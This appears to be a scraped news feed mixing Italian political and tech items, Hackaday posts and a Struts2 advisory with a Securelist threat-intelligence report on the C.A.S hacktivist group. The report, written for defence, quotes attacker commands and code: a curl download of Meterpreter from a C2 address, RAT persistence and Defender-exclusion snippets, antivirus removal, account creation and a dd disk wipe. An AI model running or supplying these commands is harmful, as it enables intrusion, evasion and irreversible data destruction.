Salta al contenuto principale



Il Ministro Giuseppe Valditara ha firmato il decreto che prevede lo stanziamento di ulteriori 30 milioni, nell’ambito del #PNRR, destinati a potenziare i Percorsi per le Competenze Trasversali e per l’Orientamento (PCTO) delle scuole superiori.
#pnrr


Windows Recall Salva i Dati Delle Carte Di Credito nelle immagini


Microsoft sta testando ancora una volta la funzionalità Recall, il cui rilascio era stato precedentemente ritardato a causa di problemi di privacy e sicurezza. Recall è attualmente disponibile solo per i membri del programma Windows Insiders, ma gli utenti hanno già notato dei problemi: la funzione salva numeri di carte bancarie, numeri di previdenza sociale e altre informazioni sensibili, anche quando è vietata.

Come funziona Windows Recall


Ricordiamo che Recall è stato introdotto a maggio 2024. La funzionalità è pensata per aiutare a “ricordare” qualsiasi informazione che l’utente ha visualizzato in passato, rendendola accessibile tramite una semplice ricerca. Pertanto, Recall, che doveva essere abilitato per impostazione predefinita su tutti i nuovi PC Copilot+, scatta un’istantanea della finestra attiva sullo schermo ogni pochi secondi, registrando tutto ciò che accade in Windows, sia che si visiti i siti Web in un browser, comunicando in modo istantaneo. messenger o lavorare con altre applicazioni.

Le immagini risultanti vengono elaborate dalla Neural Processing Unit (NPU) del dispositivo e da un modello AI per estrarre i dati dagli screenshot. Le informazioni vengono quindi archiviate nel database e gli utenti possono effettuare ricerche nella cronologia utilizzando query nella loro lingua madre.

Subito dopo il suo annuncio, Recall è stato pesantemente criticato sia dagli esperti di sicurezza che dai difensori della privacy. Gli esperti hanno paragonato la funzione a un keylogger e hanno dimostrato che con esso si possono rubare dati. In risposta a queste critiche, Microsoft ha ritardato il lancio di Recall e ha affermato che avrebbe fornito ulteriore sicurezza rendendo la funzionalità opzionale e crittografando il database in modo che sia inaccessibile finché l’utente non viene autenticato utilizzando Windows Hello.

L’esperimento di Tom’s Hardware


Secondo Tom’s Hardware, Recall è recentemente diventato di nuovo disponibile per i membri del programma Windows Insiders. La funzione ora dovrebbe crittografare i dati e viene fornita con l’impostazione Filtra informazioni sensibili abilitata per impostazione predefinita, progettata per bloccare la registrazione di app e siti che potrebbero visualizzare numeri di carte bancarie, numeri di previdenza sociale e altre informazioni finanziarie e personali. Tuttavia, i giornalisti hanno scoperto che questo filtro non sempre funziona.
28682215
Pertanto, Recall ha catturato con successo il testo dal Blocco note con un nome utente, una password e un numero di carta bancaria casuali, sebbene accanto ad esso fosse scritto il nome della banca e del sistema di pagamento (“Capital One Visa”).

Allo stesso modo, Recall ha ignorato le impostazioni e ha acquisito i dati da una richiesta di prestito completata in formato PDF, aperta in Microsoft Edge. Il documento conteneva un numero di previdenza sociale, nome e data di nascita.

Una funzionalità ancora da migliorare


Anche la creazione di una semplice pagina HTML che diceva direttamente “Inserisci il numero della tua carta di credito” e forniva campi per inserire il numero della carta, il codice CVC e la data di scadenza della carta non ha aiutato ad attivare il filtro. Recall ha catturato e salvato con successo tutti i dati inseriti nel modulo.
28682217
Allo stesso tempo, la nuova funzione Microsoft ha rifiutato di acquisire i dati delle carte bancarie dopo aver visitato le pagine di pagamento di due negozi online: Pimoroni e Adafruit. Cioè, per i siti commerciali reali il filtro funzionava ancora.

“Cioè, quando si trattava di veri siti commerciali, Recall ha fatto tutto bene. Tuttavia, il mio esperimento mostra che è quasi impossibile per il filtro AI di Microsoft rilevare tutte le situazioni in cui vengono visualizzate informazioni sensibili sullo schermo ed evitare di catturarle. I miei esempi sono stati pensati per testare un filtro, ma questi non sono casi affatto rari. Le persone inseriscono informazioni personali sensibili nei moduli PDF. Registrano, copiano e incollano i dati in file di testo, quindi li inseriscono in siti che non assomigliano ai tipici siti di negozi”, afferma Avram Piltch, redattore capo di Tom’s Hardware.

Quando la pubblicazione ha contattato i rappresentanti di Microsoft per un commento, la società ha risposto con un collegamento a un post sul blog dedicato a Recall. Dice che gli sviluppatori “stanno continuando a migliorare questa funzionalità” e consiglia di segnalarlo tramite Hub di feedback se trovi informazioni sensibili che dovrebbero essere filtrate.

Allo stesso tempo, Pilch osserva che i dati catturati da Recall sono ora effettivamente crittografati (la forza di questa crittografia sarà sicuramente verificata dai ricercatori di sicurezza) e l’accesso ad essi richiede l’autenticazione tramite Windows Hello. Secondo lui gli screenshot vengono salvati in una sottocartella chiamata AsymStore e non possono essere aperti come PNG, BMP o JPG.

“È possibile che gli hacker riescano a capire come aprire questi file, ma per quanto ne so, l’utente medio non sarà in grado di aprirli al di fuori dell’app Recall”, conclude Pilch.

L'articolo Windows Recall Salva i Dati Delle Carte Di Credito nelle immagini proviene da il blog della sicurezza informatica.

reshared this



Elena Basile - Le oligarchie liberali scelgono l’autoritarismo (con la complicità dell’intellighentia progressista) - OP-ED - L'Antidiplomatico
lantidiplomatico.it/dettnews-e…


What is probably happening with all those drone sightings; Cellebrite used as a doorway to malware; and an art project and a cease and desist.#Podcast


Si cerca di lasciar passare, in Italia, la giornata del 18 dicembre come una festività consolatoria in cui i bianchi suprematisti dimostrano di voler accogliere anche chi arriva da altri paesi. Una menzogna, si rimuove l’origine di tale giornata. Nella stessa data, ma si era nel 1990, le Nazioni Unite elaborarono una “Convenzione per la protezione dei diritti dei lavoratori migranti e delle loro famiglie”.

Un testo lungo e articolato, composto da oltre 90 articoli e tutto sommato moderato. Si limita a garantire i diritti e le tutele fondamentali per chi emigra e lavora, con generici richiami ad una convivenza e ad una parità che oggi paiono rivoluzionari. Non a caso solo i Paesi allora di emigrazione, neanche tutti, ratificarono la Convenzione. Non lo hanno fatto i paesi UE, il Brasile, gli Usa, il Canada, l’India, l’Australia e il Giappone, nemmeno il Sudafrica e i Paesi del Golfo, ovvero quelli in cui si emigra.

Guai a mettere a repentaglio il diritto a sfruttare che un colonialismo che dura da oltre 500 anni, costituisce l’ossatura dell’occidente, intende mantenere. Meglio lasciare che le decisioni – sovente negative e repressive – le prendano i singoli Stati sulla base delle proprie convenienze. E, per parlare di noi, in questi 34 anni si sono susseguiti di ogni colore, orientamento, composizione, ma questa proposta che rappresenta il minimo sindacale, non ha mai trovato l’approvazione di governi e parlamenti.

Il suo ruolo è dimenticato ovviamente anche dall’apparato mediatico che sostiene il suprematismo, pronto a criminalizzare chi emigra e non soddisfa il vincolo di subalternità, ma incapace di fare i conti con una società la cui composizione è profondamente cambiata. Per noi comuniste/i questo non è un giorno di festa ma un giorno di lotta che va tenuta alta per 365 giorni l’anno. Non ci autoassolviamo con la carità pelosa di chi solo oggi si accorge di chi aspira, ad esempio, ad avere cittadinanza, diritto di voto, welfare.

Siamo insieme a chi si rivolta e pretende un futuro diverso. La ratifica di una Convenzione dovrà segnare solo uno dei tanti passi da compiere nel segno di una lotta di classe che riafferma, partendo da ciò, la sua volontà di ricomporre ciò che il capitalismo ha frammentato.

Maurizio Acerbo, Segretario nazionale
Stefano Galieni, Responsabile immigrazione, Partito della Rifondazione Comunista – Sinistra Europea



Struts2: Un Path Traversal porta al caricamento di una Web Shell. La caccia è già iniziata!


La vulnerabilità critica recentemente risolta in Apache Struts 2 (CVE-2024-53677) viene già utilizzata attivamente dagli hacker e viene attaccata utilizzando exploit proof-of-concept pubblici.

La scorsa settimana, gli sviluppatori Apache hanno reso pubblico il bug critico CVE-2024-53677 (punteggio CVSS 9,5). È stato segnalato che si trattava di un attacco path traversal nel caricamento dei file, consentendo il caricamento di file dannosi (come le shell Web), portando all’esecuzione di codice remoto.

La vulnerabilità colpisce le versioni Struts 2.0.0-2.3.37 (versione obsoleta), 2.5.0-2.5.33 e 6.0.0-6.3.0.2.

“Un utente malintenzionato può manipolare le impostazioni di caricamento dei file per ottenere l’attraversamento del percorso e, in determinate circostanze, ciò potrebbe comportare il caricamento di un file dannoso che può essere utilizzato per l’esecuzione di codice in modalità remota”, hanno scritto gli sviluppatori.

Questa vulnerabilità è simile al vecchio bug CVE-2023-50164 si ritiene che sia dovuta a una correzione inefficace o incompleta.

Gli specialisti dell’ISC SANS stanno già segnalando tentativi di sfruttamento del nuovo problema. Secondo loro, gli aggressori sembrano utilizzare exploit PoC disponibili al pubblico o esserne notevolmente “ispirati”.

Attualmente, gli aggressori mirano a identificare i sistemi vulnerabili utilizzando un exploit per scaricare il file exploit.jsp, che contiene una singola riga di codice per stampare la stringa “Apache Struts”. L’exploit tenta quindi di accedere allo script e verificare che il server sia affetto dal bug o meno.

Si consiglia agli utenti di aggiornare Struts alla versione 6.4.0 il prima possibile e di passare al nuovo meccanismo di caricamento dei file. Il punto è che installare semplicemente una patch non è sufficiente: il codice responsabile della gestione del caricamento dei file nelle applicazioni Struts deve essere riscritto per utilizzare il nuovo meccanismo Action File Upload.

“Continuando a utilizzare il vecchio meccanismo di caricamento file, rimani vulnerabile a tali attacchi”, avverte l’azienda.

L'articolo Struts2: Un Path Traversal porta al caricamento di una Web Shell. La caccia è già iniziata! proviene da il blog della sicurezza informatica.



Da Usa-Urss a Russia-Ucraina. Così la guerra ibrida cambia le operazioni di intelligence

@Notizie dall'Italia e dal mondo

L’uccisione del generale Igor Kirillov a Mosca, mediante un ordigno nascosto in un monopattino elettrico, rappresenta l’ultimo episodio di una guerra che va ben oltre il tradizionale campo di battaglia ucraino. Questa “guerra nell’ombra”



Catching the View from the Edge of Space


28669394

Does “Pix or it didn’t happen” apply to traveling to the edge of space on a balloon-lofted solar observatory? Yes, it absolutely does.

The breathtaking views on this page come courtesy of IRIS-2, a compact imaging package that creators [Ramón García], [Miguel Angel Gomez], [David Mayo], and [Aitor Conde] recently decided to release as open source hardware. It rode to the edge of space aboard Sunrise III, a balloon-borne solar observatory designed to study solar magnetic fields and atmospheric plasma flows.

28669396To do that the observatory needed a continual view of the Sun over an extended period, so the platform was launched from northern Sweden during the summer of 2024. It rose to 37 km (23 miles) and stayed aloft in the stratosphere tracking the never-setting Sun for six and a half days before landing safely in Canada.

Strictly speaking, IRIS-2 wasn’t part of the primary mission, at least in terms of gathering solar data. Rather, the 5 kg (11 pound) package was designed to provide engineering data about the platform, along with hella cool video of the flight. To that end, it was fitted with four GoPro cameras controlled by an MPS340 microcontroller. The cameras point in different directions to capture all the important action on the platform, like the main telescope slewing to track the sun, as well as details of the balloon system itself.

The controller was programmed to record 4K video at 30 frames per second during launch and landing, plus fifteen minutes of 120 FPS video during the balloon release. The rest of the time, the cameras took a single frame every two minutes, which resulted in some wonderful time-lapse sequences. The whole thing was powered by 56 AA batteries, and judging by the video below it performed flawlessly during the flight, despite the penetrating stratospheric cold and blistering UV exposure.

Hats off to the IRIS-2 team for this accomplishment. Sure, the videos are a delight, but this is more than just eye candy. Seeing how the observatory and balloon platform performed during flight provides valuable engineering data that will no doubt improve future flights.

youtube.com/embed/CKWAjiNBPxo?…


hackaday.com/2024/12/18/catchi…



Come gestire il tuo personale social network federato (con Snac)

Il post di @giacomo@snac.tesio.it

ho incontrato Snac di Grunfink , una semplice istanza minimalista di #ActivityPub scritta in C portabile ma comunque sufficientemente potente da interagire con i front-end di Mastodon come Tusky , Fedilab o Tootle

encrypted.tesio.it/2024/12/18/…

@Che succede nel Fediverso?

#fediverso

reshared this



Gli Stati Uniti stanno proteggendo l’Italia perché l’esercito italiano non è abbastanza forte?

a parte che ci sono basi negli usa come basi usa in italia, se ti informi bene, ma le basi usa sono nato, sono in tutta europa, e sono forse l'unico motivo per cui la russia non ha ancora invaso il resto d'europa. con gente come putin funziona solo la deterrenza. per non essere attaccati serve che il nemico sappia che saresti pronto. putin ha attaccato l'ucraina perché pensava sarebbe stata una passeggiata. ma purtroppo l'ucraina per quanto male armata, come risorse umane, era il meglio dell'ex urss. e quando hanno deciso di non sentirsi più russi per putin è stato un casino. l'altra fortuna dell'ucraina era che all'europa non conveniva una russia dilagante in europa. non conveniva permettere una nuova invasione di hitler della polonia. e per fortuna dell'europa gli USA sono anti russi a prescindere (giustamente secondo la loro logica).



GAZA. La Stampa cieca: una mostra artistica sulle mura dell’ospedale di Nuseirat


@Notizie dall'Italia e dal mondo
Domenica 16 dicembre la mostra è stata così inaugurata sui muri esterni dell'ospedale Al-Awda, nel nord del campo profughi di Nuseirat, nel centro della Striscia di Gaza: "In un contesto in cui molti materiali artistici necessari per la creatività



Analysis of Cyber Anarchy Squad attacks targeting Russian and Belarusian organizations


28656724

About C.A.S


C.A.S (Cyber Anarchy Squad) is a hacktivist group that has been attacking organizations in Russia and Belarus since 2022. Besides data theft, its goal is to inflict maximum damage, including reputational. To this end, the group’s attacks exploit vulnerabilities in publicly available services and make extensive use of free tools.

Our latest investigation unearthed new activity by the group, explored the attack stages, and analyzed the tools and malware used. In addition, we discovered links between C.A.S and other hacktivist groups, such as the Ukrainian Cyber Alliance and DARKSTAR.

Like most hacktivist groups, C.A.S uses Telegram as a platform to spread information about victims. We found a channel that posts news and messages about the group’s attacks and ideology, as well as a chat hosting a discussion of its activities.

C.A.S on Telegram
C.A.S on Telegram

Note: this post examines active Telegram channels that we presume to be run by hacktivist groups. Use these sources with caution.

Tactics


This section analyzes the attack chain as per the MITRE ATT&CK framework, as well as the tools we found in the current C.A.S campaign.

Initial Access


C.A.S gains initial access to targeted systems by means of the Exploit Public-Facing Application technique (T1190). The attackers compromise Jira, Confluence and Microsoft SQL Server services using vulnerabilities that we were unable to identify due to the data storage limitations of the attacked segment. However, our analysis of the group leader’s messages in the C.A.S Telegram channel suggests that the hacktivists do not use phishing emails as an initial attack vector. Instead, they likely attack vulnerable network resources or gain access to systems after their compromise by third parties.

Messages from the C.A.S leader known as The Way
Messages from the C.A.S leader known as The Way

Translation:
But I need them to let us into the network mole/fishers

The aim of the C.A.S group is to inflict maximum financial and reputational damage on organizations in Russia and Belarus. In pursuit of this goal, they likely exploit vulnerabilities not only in Jira, Confluence and MS SQL, but in other publicly available services and systems too. What’s more, we are aware of attacks carried out by C.A.S in collaboration with other groups, which is another way they gain initial access and move through victims’ infrastructure.

Message about the group's methods of gaining initial access
Message about the group’s methods of gaining initial access

Translation:
but our method is to technically break through the outer perimeter, and those organizations that we need here and now often prefer to maintain 1 site, 2–3 reliable services and not poke around the network once again. so you set yourself the task to hack the company N. naturally, this is done through phishing, but unfortunately, we simply don’t have any fishers in our squad, and our arsenal is not designed for beacon flooding, but for exploits

Execution


To move further through the infrastructure, the threat actors used rare open-source remote access Trojans (RATs), including Revenge RAT and Spark RAT, which we have not seen in attacks by other hacktivists. These utilities allowed them to remotely control the infected systems and execute various commands.

In one incident, we detected the use of a compromised MS SQL service to execute commands in cmd. This was indicated by the cmd.exe process running as a child process of sqlservr.exe.

The attackers also used PowerShell to execute scripts:
powershell.exe -ex bypass -f \\[DOMAIN]\netlogon\rm.ps1
On top of this, the attackers downloaded the Meterpreter reverse shell for the Metasploit framework from the C2 server to the infected host using the cURL tool:
"$system32\cmd.exe",""$system32\cmd.exe" /c cd %appdata% && dir && curl -O
hxxp://185.117.75[.]3:8092/sdc.exe
In some reverse shell incidents, we also found traces of Revenge RAT (48210CA2408DC76815AD1B7C01C1A21A) being run through the PowerShell process:
powershell.exe -WindowStyle Hidden -NoExit -Command
[System.Reflection.Assembly]::LoadFile('C:\Users\<username>\Downloads\
<exe_name>.exe').EntryPoint.Invoke($null, @())

Persistence


To gain persistence in the system, the threat actors created accounts on compromised hosts using the net.exe utility:
C:\Windows\system32\cmd.exe" /c net user admin cas /add
C:\Windows\system32\cmd.exe" /c net user admin admin123123123 /add
It’s worth noting that they used the password
cas for the admin account, matching the name of the group.
We also found samples of Revenge RAT that had gained persistence in the system by adding registry keys to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
try {
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
true);
try {
if (!((string)((registryKey != null) ? registryKey.GetValue("\"" +
Path.GetFileNameWithoutExtension(Program._installName) + "\"") : null) == text) &&
registryKey != null) {
registryKey.SetValue(fileNameWithoutExtension, "\"" + text + "\"");
}
} catch {
if (registryKey != null) {
registryKey.SetValue(fileNameWithoutExtension, "\"" + text + "\"");
}
}
if (registryKey != null) {
registryKey.Dispose();
}
}
internal static string _installName = "rpchost.exe";
These Trojan samples were additionally copied to the Startup folder:
File.Copy(Application.ExecutablePath, "C:\\Users\\" + Environment.UserName +
"\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" +
Program._installName);

internal static string _ip = "194.36.188.94";
internal static string _installName = "svhost.exe";
During execution, one of the above RAT samples (FC3A8EABD07A221B478A4DDD77DDCE43) created a watchdog timer file called svxhost.exe in the C:\Windows\System32 directory, wrote information to this file, created the NgcMngrSvc service with svxhost.exe as an executable file, and ran this service.

[HandleProcessCorruptedStateExceptions]private static void CreateWatchdog() {
Program.hService = Helper.OpenService(Program.hSCM, "NgcMngrSvc", 4);
if (Program.hService == IntPtr.Zero) {
try {
File.WriteAllBytes(Program.system + "svxhost.exe",
Program.GetResource("dog"));
} catch {
}
Program.hService = Helper.CreateService(Program.hSCM, "NgcMngrSvc", "Microsoft
Passport Manager", 983551, 16, 2, 0, Program.system + "svxhost.exe", null, IntPtr.Zero,
null, null, null);
}
Helper.StartService(Program.hService, 0, null);
}

Defense Evasion


During our incident investigations, we often noted that the attackers gained full control over information security tools because these were not properly configured. To implement effective anti-attack measures, it is vital to perform regular testing, updating and integration of security systems. A key factor in securing infrastructure is compliance with password-protection policies for access to the information security systems.

In one of the incidents, C.A.S managed to disable an EPP agent without a password, using the rm.ps1 script.
$guidQuery = wmic product where "[redacted]" get IdentifyingNumber
$guid = $guidQuery | Select-String -Pattern "{[A-F0-9-]+}" | ForEach-Object {
$_.Matches[0].Value }

if ($guid -ne $null) {
$msiexecCommand2 = "msiexec.exe /x $guid /quiet"
Start-Process -NoNewWindow -FilePath cmd -ArgumentList "/c $msiexecCommand2"
}
The final command to disable the EPP agent was this:
cmd.exe /c msiexec.exe /x {GUID} /quiet
Also, as part of the Defense Evasion technique, the attackers use Revenge RAT to add the $windir\$system32 directory to the Windows Defender exclusion list. This allows the group to hide its activity, because the RAT itself and its malicious payload are both installed in this folder.
"\"$windir\\$system32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -
Command \"Add-MpPreference -ExclusionPath '$windir\\$system32'\""
And to further reduce the likelihood of detection, the attackers use a malware naming convention that mimics legitimate Windows processes:
C:\Windows\System32\svxhost.exe
C:\Windows\System32\svrhost.exe
C:\Windows\System32\drivers\etc\rpchost.exe
C:\Windows\panther\ssbyt.exe

Credential Access


In our study of hacktivist groups (Twelve, BlackJack, Head Mare, Crypt Ghouls and others), we often encountered the use of the same credential extraction tools, namely XenAllPasswordPro, BrowserThief and Mimikatz. These tools have long been known in the community and regularly feature in our crimeware reports.

  • XenAllPasswordPro extracts passwords from system storages.
  • BrowserThief compromises browser data, including autofill data and saved accounts.
  • Mimikatz extracts password hashes from Windows RAM.

C.A.S is no exception: we found these tools in their attacks as well. This is yet further proof that hacktivist groups attacking Russia and Belarus tend to deploy the same arsenal of publicly available utilities.

Discovery


At the infrastructure exploration stage, the attackers made active use of various commands to collect information. Here’s a list of the commands we logged:

CommandDescription
net userLists all local user accounts (using net.exe)
systeminfoDisplays detailed system information, including operating system version, installation date and patch date, as well as computer model, CPU and memory settings
cmd verDisplays the operating system version
net localgroupDisplays a list of all local groups on the computer (using net.exe)
net accountsDisplays user account settings, such as password expiration period, minimum password length and account lockout conditions (using net.exe)
net user /domainDisplays a list of user accounts in the domain (using net.exe)
cd %appdata% && whoamiNavigates to the %appdata% folder, then displays the name of the user executing this command

The Revenge RAT samples also ran WMI queries to collect information about the operating system and CPU to be sent to the attackers’ command-and-control (C2) server:
SELECT * FROM Win32_OperatingSystem
SELECT UserName FROM Win32_ComputerSystem
SELECT * FROM WIN32_Processor

Command and Control


To communicate with the C2 server, C.A.S uses various tools. We saw the use of reverse shells generated by the msfvenom tool for the Metasploit framework, as well as publicly available RATs.

Revenge RAT


The attackers first used Revenge RAT to establish a connection to the C2 server, then downloaded and installed the necessary payloads of various frameworks; they also collected data about the infected host and sent it to the server.

We found two similar customized samples of Revenge RAT in the attacks we investigated. Below is a full list of functions found in these variants:

FC3A8EABD07A221B478A4DDD77DDCE4348210CA2408DC76815AD1B7C01C1A21A
FilesInFolderFilesInFolder
DrivesDrives
CreateFileCreateFile
DeleteFileDeleteFile
MoveFileMoveFile
CopyFileCopyFile
ArchiveFileArchiveFile
UploadFileUploadFile
DownloadFileDownloadFile
ShellCommandShellCommand
UninstallUninstall
ClientModel
DisconnectMsg
Ping
Text

The configuration files for these samples are also similar:

FC3A8EABD07A221B478A4DDD77DDCE4348210CA2408DC76815AD1B7C01C1A21A
internal static string _ip = "194.36.188.94";

internal static string _installName = "rpchost.exe";

private static int _port = 1337;

internal static bool _install = true;

internal static string _group = "cci.by2";

internal static string _startupMethod = "hklm";

internal static string _installLocation = "windir\\System32\\drivers\\etc\\";

internal static bool _installWatchdog = true;

internal static bool _usePowershell = false;

private static Client _client;

internal static Process cmd;

private static IntPtr hSCM;

internal static IntPtr hService;

private static string system = Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\";

internal static string _ip = "194.36.188.94";

internal static string _installName = "sysinfo";

private static int _port = 1337;

internal static bool _install = true;

private static Client _tcpClient;

internal static Process cmd;

Spark RAT


As mentioned above, the group used another remote access Trojan called Spark RAT. Below is its configuration:
{
  "secure":false,
  "host":"185.117.75.3",
  "port":9610,
  "path":"/",
  "uuid":"3917b41****",
  "key":"aa494c90****"
}
From the IP address specified in the configuration, the attackers downloaded the Meterpreter payload to the victim’s device.

Alongside this, Spark RAT automatically collects and sends the following system information to the C2 server:

Trojan functionDescription
idUnique device identifier
runtime.GOOSInformation about the operating system in which the RAT is running
runtime.GOARCHCPU architecture
localIPLocal IP address of the device
macAddrMAC address of the network interface of the device
cpuInfoCPU information
ramInfoAmount of RAM
netInfoGeneral information about network connections
diskInfoInformation about disk drives
uptimeSystem uptime since the last boot
hostnameDevice name
usernameName of the current user

Spark RAT provides the operator with a wide range of commands to control the target device. These commands allow both basic operations (such as PING to check client availability, SHUTDOWN to turn off the device, and RESTART to reboot it) as well as more complex ones, such as remote file management (FILES_LIST, FILES_FETCH, FILES_UPLOAD), terminal interaction (TERMINAL_INIT, TERMINAL_INPUT, TERMINAL_RESIZE) and remote desktop access (DESKTOP_INIT, DESKTOP_SHOT). Also available to the operator are commands to manage processes (PROCESSES_LIST, PROCESS_KILL) and execute system commands (COMMAND_EXEC).

Meterpreter


In one of the incidents, we found a Meterpreter reverse shell (6CBC93B041165D59EA5DED0C5F377171). Using this, the group was able to gain full access to the compromised system and do the following:

  1. Remotely manage the file system;
  2. Intercept network traffic;
  3. Log keystrokes;
  4. Extract password hashes;
  5. Perform pivoting techniques through compromised hosts;
  6. Monitor the webcam and microphone.

The reverse shell contains the following C2 server address and port:
185.117.75[.]35:4444

Impact


To cause damage to victims, the group encrypts their infrastructure. As we’ve noted before in similar hacktivist attacks, the threat actors’ arsenal consists of leaked LockBit ransomware builders for Windows systems and Babuk for Linux systems. In the majority of C.A.S attacks, encrypted file extensions are generated randomly; but sometimes the number 3119 appears both in the name of the executable file of the ransomware Trojan, and in the extensions added to encrypted files. This number often crops up in C.A.S activity — we see it in usernames, ransom notes, encrypted file extensions and group-related merchandise. It is not a random sequence of digits, but represents the positions of the letters C, A, and S in the alphabet: C is 3, A is 1 and S is 19.

One of the group’s ransomware samples is named 3119.exe. In our investigation of a C.A.S attack involving this sample, we found a ransom note displayed after file encryption in the system:

C.A.S ransom note
C.A.S ransom note

Besides encryption, the attackers can destroy data in different segments of the victim’s network or on specific servers. To do this, they first collect information about attached drives using the df system utility:
df -h
Then, to destroy the data, they use the dd system utility, which executes /dev/zero — a file that generates an endless stream of null bytes. The attackers copy null bytes from /dev/zero to the /dev/[VOLUME] partition of their choice in 4 MB blocks. This overwrites the data in the partition with zeros, wiping it forever.
dd if=/dev/zero of=/dev/[VOLUME] bs=4M
This operation allows the attackers to irreversibly destroy data on the victim’s servers.

On Telegram, the perpetrators often confirm their destructive impact on victims’ infrastructure. In their posts, they describe what they did and attach screenshots with the results of their operations. Which part of the infrastructure to encrypt and which to destroy immediately is the attackers’ choice: it depends on the situation.

Public chat message from C.A.S
Public chat message from C.A.S

Translation:
Context: these servers have been down for 3 days, one was erased (namely the volumes with data), the second was encrypted (only the directories with data). Today they were wiped to the root.

Victims


C.A.S targets companies from Russia and Belarus in various industries, including government and commercial organizations, entertainment and technology firms, telecommunications companies and industrial enterprises. This suggests that victims are chosen based on their location, regardless of their field of activity.

The group often writes about its victims on Telegram, posting screenshots of infrastructure, stolen documents and links to cloud storages or forums offering stolen data for download.

Connections to other groups


As mentioned above, besides its Telegram channel, C.A.S hosts a public chat where group members and followers actively communicate. Interestingly, the chat administrators belong not only to C.A.S, but to related groups; one of them, who goes by the name of Sean Townsend, is an administrator of the hacktivist group RUH8 and the press secretary of the Ukrainian Cyber Alliance (U.C.A).

C.A.S Discussions chat administrators and the Telegram account of the C.A.S leader The Way
C.A.S Discussions chat administrators and the Telegram account of the C.A.S leader The Way

In its Telegram channel, C.A.S states that it sometimes works with other groups that share its mission to attack organizations from Russia and Belarus. For example, we found posts about joint attacks by C.A.S with U.C.A, RUH8, RM-RF and others:

Message about a joint attack by C.A.S and U.C.A
Message about a joint attack by C.A.S and U.C.A

Message about a joint attack by C.A.S, RUH8 and RM-RF
Message about a joint attack by C.A.S, RUH8 and RM-RF

Translation:
Thanks to colleagues who helped with the last attack

While investigating an incident in the infrastructure of one C.A.S victim, we also found traces of compromise pointing to the DARKSTAR group (also known by the names Shadow and Comet). In one incident, we discovered the following files:

DARKSTARC.A.S
A file named ServiceAD and Highimage (A2D098F44ABA4967826C3002541E3BB8) that runs as a service (e.g. with the SC CREATE and SC START commands) to execute malicious files downloaded in DARKSTAR attacksSpark RAT – ovpmhnjotowtj.exe (BCEC17275114C6A87D8B7110AECEC5CC) with C2 address 185.117.75[.]3
A loader (7E101596EEB43ED2DE78BB45D7031F7B) used in multiple DARKSTAR attacks that accesses the domain itsfreerepublic[.]com to download encrypted shellcode and transfer controlRevenge RAT – sysinfo.exe (48210CA2408DC76815AD1B7C01C1A21A) and ssbyt.exe (23B873BB66DC09E91127E20825B6CBC7) with C2 address 194.36.188[.]94

These findings are further evidence of a connection between groups targeting Russian organizations. As part of their collaboration, group members likely share access to victims’ infrastructure, C2 infrastructure and tools. They also exchange information about attacks on Telegram as a way to increase campaign visibility, discredit victims and inflict reputational damage.

Takeaways


The C.A.S group poses a serious threat to organizations in Russia and Belarus. The threat actors attack key industries using an array of tools and techniques that we have observed in the campaigns of other hacktivist groups. C.A.S attacks utilize rare RATs, publicly available remote management tools, and a range of vulnerability exploitation methods. In addition, the group spreads information about its attacks through a public Telegram channel, which causes both financial and reputational damage to victims. A more detailed analysis of C.A.S attacks is available to our Threat Intelligence subscribers.

The group openly confirms that it actively collaborates with other attackers targeting Russia. Joint actions and use of a common infrastructure point to the emergence of a sophisticated attack ecosystem, in which hacktivist groups share resources, tools and access to improve efficiency and scale operations. This strategy not only complicates attribution, but significantly increases the destructive potential of attacks.

To effectively counter such groups, it is vital to harden system defenses, apply regular updates to cybersecurity tools and leverage data analytics for monitoring relevant threat activity. It is also critically important to follow best practices when configuring your information security systems. We strongly recommend the following guides:

Following these instructions will minimize the risks of compromise and increase your system’s resistance to possible attacks.

Indicators of compromise


Revenge RAT

FC3A8EABD07A221B478A4DDD77DDCE43rpchost.exe
48210CA2408DC76815AD1B7C01C1A21Asysinfo.exe
8C70377554B291D4A231CF113398C00Dsvhost.exe, svxhost.exe
23B873BB66DC09E91127E20825B6CBC7ssbyt.exe, sysinfo.exe

Spark RAT

BCEC17275114C6A87D8B7110AECEC5CCovpmhnjotowtj.exe

Meterpreter

6CBC93B041165D59EA5DED0C5F377171sdc.exe
1FCD4F83BF6414D79D5F29AD1E795B3Dsvrhost.exe

File path
C:\windows\System32\svxhost.exe
C:\Windows\system32\svrhost.exe
C:\Windows\System32\drivers\etc\rpchost.exe
C:\Windows\panther\ssbyt.exe
C:\Users\[USERNAME]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.exe

IPs
194.36.188[.]94
185.117.75[.]3


securelist.com/cyber-anarchy-s…




noyb WIN: L'autorità olandese multa Netflix per 4,75 milioni di euro
Netflix è stata multata per 4,75 milioni di euro sulla base di una denuncia della Noyb del 2019
mr18 December 2024
Netflix Logo


noyb.eu/it/noyb-win-dutch-auth…



Learning About The Flume Water Monitor


28651099

The itch to investigate lurks within all us hackers. Sometimes, you just have to pull something apart to learn how it works. [Stephen Crosby] found himself doing just that when he got his hands on a Flume water monitor.

[Stephen] came by the monitor thanks to a city rebate, which lowered the cost of the Flume device. It consists of two main components: a sensor which is strapped to the water meter, and a separate “bridge” device that receives information from the sensor and delivers it to Flume servers via WiFi. There’s a useful API for customers, and it’s even able to integrate with a Home Assistant plugin. [Stephen] hoped to learn more about the device so he could scrape raw data himself, without having to rely on Flume’s servers.

Through his reverse engineering efforts, [Stephen] was able to glean how the system worked. He guides us through the basic components of the battery-powered magnetometer sensor, which senses the motion of metering components in the water meter. He also explains how it communicates with a packet radio module to the main “bridge” device, and elucidates how he came to decompile the bridge’s software.

When he sent this one in, [Stephen] mentioned the considerable effort that went into reverse engineering the system was “a very poor use” of his time — but we’d beg to differ. In our book, taking on a new project is always worthwhile if you learned something along the way. Meanwhile, if you’ve been pulling apart some weird esoteric commercial device, don’t hesitate to let us know what you found!


hackaday.com/2024/12/18/learni…



La motosega liberista di Milei devasta l’Argentina


@Notizie dall'Italia e dal mondo
In un anno la motosega del presidente argentino di estrema destra si è abbattuta sui servizi pubblici, il welfare, il lavoro e le pensioni, aumentando povertà e disoccupazione
L'articolo La motosega pagineesteri.it/2024/12/18/ame…



COLOMBIA. La sinistra si unisce


